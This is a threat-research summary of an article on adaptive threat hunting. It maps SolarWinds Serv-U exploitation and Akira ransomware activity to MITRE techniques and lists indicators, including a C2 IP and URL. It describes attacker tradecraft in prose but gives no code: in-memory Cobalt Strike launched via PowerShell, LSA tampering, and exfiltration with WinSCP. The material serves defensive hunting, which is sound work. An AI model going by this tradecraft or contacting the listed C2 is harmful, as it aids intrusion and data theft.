Threat Research

A Modern Approach to Adaptive Threat Hunting Methodologies

Securonix

Threat hunting today blends structured methodologies, real-time data analysis, and adaptive automation to uncover anomalies, threats, and attacker activity across logs, networks, and endpoints. The article showcases traditional approaches, a modern futuristic paradigm, and a case study on Akira ransomware to illustrate proactive, multi-source hunting and continuous improvement. #AkiraRansomware #SolarWindsSERVU

Keypoints

  • Threat hunting has evolved from post-incident log reviews to proactive, continuous monitoring and automated analysis.
  • Traditional methodologies rely on structured processes, continuous monitoring, hypothesis-driven analysis, data analysis, configuration analysis, and both internal and external hunting.
  • Modern threat hunting envisions automation, AI/ML, threat intelligence integration, adaptive continuous hunting, and incident response orchestration within an expanded SOC ecosystem.
  • The SolarWinds SERV-U vulnerability example demonstrates how a structured, data‑driven threat hunt can identify exploitation and the use of Cobalt Strike after initial access.
  • The Akira ransomware case illustrates adaptive, multi-directional hunting using tools like RustDesk/AnyDesk, internal recon, credential/LSA manipulation, VPN exposure, and data exfiltration techniques.
  • Outsourcing advanced threat hunting to specialized vendors can reduce cost and expand capabilities, enabling faster detection and response.

MITRE Techniques

  • [T1190] Exploit Public-Facing Application – The vulnerability allowed exploitation leading to remote control; “The vulnerable Serv-U secure FTP launched the command prompt and powershell interface to connect to a remote C2 IP…”
  • [T1059.001] PowerShell – Use of command prompt and PowerShell to connect to C2 and execute in-memory payloads; “to connect to a remote C2 IP … to further decrypt and execute Cobalt Strike in memory.”
  • [T1219] Remote Access Tools – Adopting RustDesk and prior use of AnyDesk for persistence and C2 tasks; “downloading RustDesk, a remote access and remote control software…”
  • [T1543.003] Create or Modify System Process: Windows Service – Creation of services as part of malware persistence; “create services” in Akira incident steps.
  • [T1562.001] Impair Defenses – Attempt to hinder defenses by “disable LSA (Local Security Authority) settings” to facilitate credential theft and protections bypass.
  • [T1046] Network Service Discovery – Internal recon using Advanced IP Scanner and NETSCAN.EXE to map the network; “for mapping the network…”
  • [T1041] Exfiltration – Data exfiltration activities using WinSCP during internal recon and data access stages; “for data exfiltration.”
  • [T1485] Data Destruction – Akira activities include “destroying backups” and other disruptive actions to hinder recovery.

Indicators of Compromise

  • [IP Address] C2 – 179.60.150.32/login – remote command-and-control server used to serve encoded commands and coordination
  • [URL] C2 Channel – http://179[.]60[.]150[.]32/login – URL used to connect to the remote C2 for command retrieval
  • [Software/Tools] Remote Access Tools – RustDesk, AnyDesk – tools used for persistence and C2 tasks as part of Akira activity

Read more: https://www.sentinelone.com/blog/a-modern-approach-to-adaptive-threat-hunting-methodologies/